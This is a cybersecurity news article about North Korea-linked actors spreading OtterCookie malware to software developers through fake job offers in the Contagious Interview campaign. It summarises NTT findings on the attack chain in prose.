North Korea-linked threat actors have been identified using a new malware strain known as OtterCookie in a campaign dubbed Contagious Interview. This scheme specifically targets the software developer community by enticing them with fake job offers. Although the campaign was initially documented by Palo Alto Networks researchers in November 2023, evidence suggests that it has been operational since December 2022. The primary goal of these attacks appears to be financial gain, rather than specific targeting of individuals or organizations.
Recent developments in the Contagious Interview campaign reveal that since November 2024, threat actors have incorporated the OtterCookie malware alongside previously utilized tools such as BeaverTail and InvisibleFerret. According to a report published by NTT, the introduction of OtterCookie marks a significant evolution in the attackers’ tactics. The report states that “…SOC has observed the execution of malware other than BeaverTail and InvisibleFerret in the Contagious Interview campaign.” This ongoing evolution underscores the relentless nature of cyber threats and the importance of staying informed about emerging malware trends.
The attack chain initiated by the threat actors begins with the dissemination of malicious Node.js projects or npm packages via platforms like GitHub or Bitbucket. Moreover, attackers have recently begun employing applications developed using Qt or Electron, indicating a willingness to experiment with new techniques. Loaders for OtterCookie are utilized to retrieve JSON data from a remote source and execute it as JavaScript code. In some instances, attackers download and directly execute JavaScript code, with control transferred to a catch block upon encountering an HTTP 500 status code.
The earliest sightings of OtterCookie date back to November 2024, although security experts suspect that the malware may have been active as early as September 2024 with minor variations in implementation. The November version of OtterCookie utilizes Socket.IO for communication and can execute remote commands through the socketServer function. These commands include activities such as executing shell commands and exfiltrating device information. Notably, threat actors have employed shell commands like ‘ls’ and ‘cat’ to search for cryptocurrency wallet keys within specific files, which are subsequently sent to a remote server for analysis.
In light of these developments, experts advise caution as the Contagious Interview campaign shows no signs of slowing down and is continuously updating its attack methods. Incidents related to this campaign have also been reported in Japan, underscoring the global reach of these threat actors. The report provides crucial Indicators of Compromise (IoCs) to assist organizations in identifying and mitigating potential threats associated with OtterCookie and related malware.
For the latest updates on cybersecurity threats and trends, follow SecurityAffairs on Twitter, Facebook, and Mastodon. You can also connect with Pierluigi Paganini, the author of the original report, on LinkedIn for more insights into the world of hacking and malware. Stay informed and stay secure in an ever-evolving digital landscape.
Original Post URL: https://securityaffairs.com/172382/malware/north-korea-linked-actors-using-ottercookie-backdoor.html
Category & Tags: APT, Breaking News, Hacking, Malware, Contagious Interview, Information Security News, IT Information Security, North Korea, OtterCookie, Pierluigi Paganini, Security News – APT, Breaking News, Hacking, Malware, Contagious Interview, Information Security News, IT Information Security, North Korea, OtterCookie, Pierluigi Paganini, Security News